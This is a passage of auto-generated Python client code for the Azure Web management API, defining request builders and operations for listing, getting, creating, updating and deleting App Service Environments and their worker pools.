# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_worker_pool_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_create_or_update_worker_pool_request_initial(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
*,
json: Optional[_models.WorkerPoolResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
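# Illustrative sketch (placeholder body): builders that carry a payload accept
# either ``json`` or raw ``content``, and emit a Content-Type header only when
# one is supplied.
def _example_create_worker_pool_request() -> None:
    request = build_create_or_update_worker_pool_request_initial(
        resource_group_name="example-rg",
        name="example-ase",
        worker_pool_name="wp1",
        subscription_id="00000000-0000-0000-0000-000000000000",
        json={"properties": {"workerSize": "Small", "workerCount": 2}},  # hypothetical shape
        content_type="application/json",
    )
    print(request.method, request.url)  # PUT .../workerPools/wp1?...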
def build_update_worker_pool_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
*,
json: Optional[_models.WorkerPoolResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_list_worker_pool_instance_metric_definitions_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
instance: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/instances/{instance}/metricdefinitions") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"instance": _SERIALIZER.url("instance", instance, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_web_worker_metric_definitions_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/metricdefinitions") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_worker_pool_skus_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/skus") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_web_worker_usages_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/usages") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
class AppServiceEnvironmentsOperations: # pylint: disable=too-many-public-methods
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.web.v2019_08_01.WebSiteManagementClient`'s
:attr:`app_service_environments` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(
self,
**kwargs: Any
) -> Iterable[_models.AppServiceEnvironmentCollection]:
"""Get all App Service Environments for a subscription.
Get all App Service Environments for a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceEnvironmentCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("AppServiceEnvironmentCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': "/subscriptions/{subscriptionId}/providers/Microsoft.Web/hostingEnvironments"} # type: ignore
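    # Illustrative usage sketch (comments only; assumes a configured
    # WebSiteManagementClient named ``client``):
    #
    #     for ase in client.app_service_environments.list():
    #         print(ase.name)
    #
    # The returned ItemPaged follows ``next_link`` transparently, re-running
    # prepare_request() until the service stops returning a continuation.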
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> Iterable[_models.AppServiceEnvironmentCollection]:
"""Get all App Service Environments in a resource group.
Get all App Service Environments in a resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AppServiceEnvironmentCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentCollection]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_resource_group.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("AppServiceEnvironmentCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments"} # type: ignore
@distributed_trace
def get(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> _models.AppServiceEnvironmentResource:
"""Get the properties of an App Service Environment.
Get the properties of an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceEnvironmentResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentResource]
request = build_get_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
def _create_or_update_initial(
self,
resource_group_name: str,
name: str,
hosting_environment_envelope: _models.AppServiceEnvironmentResource,
**kwargs: Any
) -> _models.AppServiceEnvironmentResource:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentResource]
_json = self._serialize.body(hosting_environment_envelope, 'AppServiceEnvironmentResource')
request = build_create_or_update_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # 200, 201, and 202 all carry the same AppServiceEnvironmentResource payload.
        deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
@distributed_trace
def begin_create_or_update(
self,
resource_group_name: str,
name: str,
hosting_environment_envelope: _models.AppServiceEnvironmentResource,
**kwargs: Any
) -> LROPoller[_models.AppServiceEnvironmentResource]:
"""Create or update an App Service Environment.
Create or update an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param hosting_environment_envelope: Configuration details of the App Service Environment.
:type hosting_environment_envelope:
~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either AppServiceEnvironmentResource or the
result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentResource]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentResource]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
hosting_environment_envelope=hosting_environment_envelope,
api_version=api_version,
content_type=content_type,
                cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
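    # Illustrative LRO sketch (comments only; placeholder values):
    #
    #     poller = client.app_service_environments.begin_create_or_update(
    #         resource_group_name="example-rg",
    #         name="example-ase",
    #         hosting_environment_envelope=envelope,  # AppServiceEnvironmentResource
    #     )
    #     ase = poller.result()  # blocks until the ARM operation completes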
def _delete_initial( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
name: str,
force_delete: Optional[bool] = None,
**kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[None]
request = build_delete_request_initial(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
force_delete=force_delete,
template_url=self._delete_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
@distributed_trace
def begin_delete( # pylint: disable=inconsistent-return-statements
self,
resource_group_name: str,
name: str,
force_delete: Optional[bool] = None,
**kwargs: Any
) -> LROPoller[None]:
"""Delete an App Service Environment.
Delete an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
        :param force_delete: Specify :code:`true` to force the deletion even if the App Service
         Environment contains resources. The default is :code:`false`.
:type force_delete: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[None]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
force_delete=force_delete,
api_version=api_version,
                cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
        elif polling is False:
            polling_method = cast(PollingMethod, NoPolling())
        else:
            polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
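    # Illustrative sketch (comments only): pass force_delete=True to remove an
    # environment that still contains resources; result() returns None.
    #
    #     client.app_service_environments.begin_delete(
    #         "example-rg", "example-ase", force_delete=True).result()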
@distributed_trace
def update(
self,
resource_group_name: str,
name: str,
hosting_environment_envelope: _models.AppServiceEnvironmentPatchResource,
**kwargs: Any
) -> _models.AppServiceEnvironmentResource:
"""Create or update an App Service Environment.
Create or update an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:param hosting_environment_envelope: Configuration details of the App Service Environment.
:type hosting_environment_envelope:
~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentPatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceEnvironmentResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2019_08_01.models.AppServiceEnvironmentResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.AppServiceEnvironmentResource]
_json = self._serialize.body(hosting_environment_envelope, 'AppServiceEnvironmentPatchResource')
request = build_update_request(
resource_group_name=resource_group_name,
name=name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.update.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        # 200, 201, and 202 all carry the same AppServiceEnvironmentResource payload.
        deserialized = self._deserialize('AppServiceEnvironmentResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}"} # type: ignore
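    # Illustrative sketch (comments only): unlike begin_create_or_update, this
    # PATCH variant is synchronous and returns the updated resource directly.
    #
    #     patch = AppServiceEnvironmentPatchResource(...)  # fields as needed
    #     ase = client.app_service_environments.update(
    #         "example-rg", "example-ase", patch)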
@distributed_trace
def list_capacities(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.StampCapacityCollection]:
"""Get the used, available, and total worker capacity an App Service Environment.
Get the used, available, and total worker capacity an App Service Environment.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the App Service Environment.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StampCapacityCollection or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.web.v2019_08_01.models.StampCapacityCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
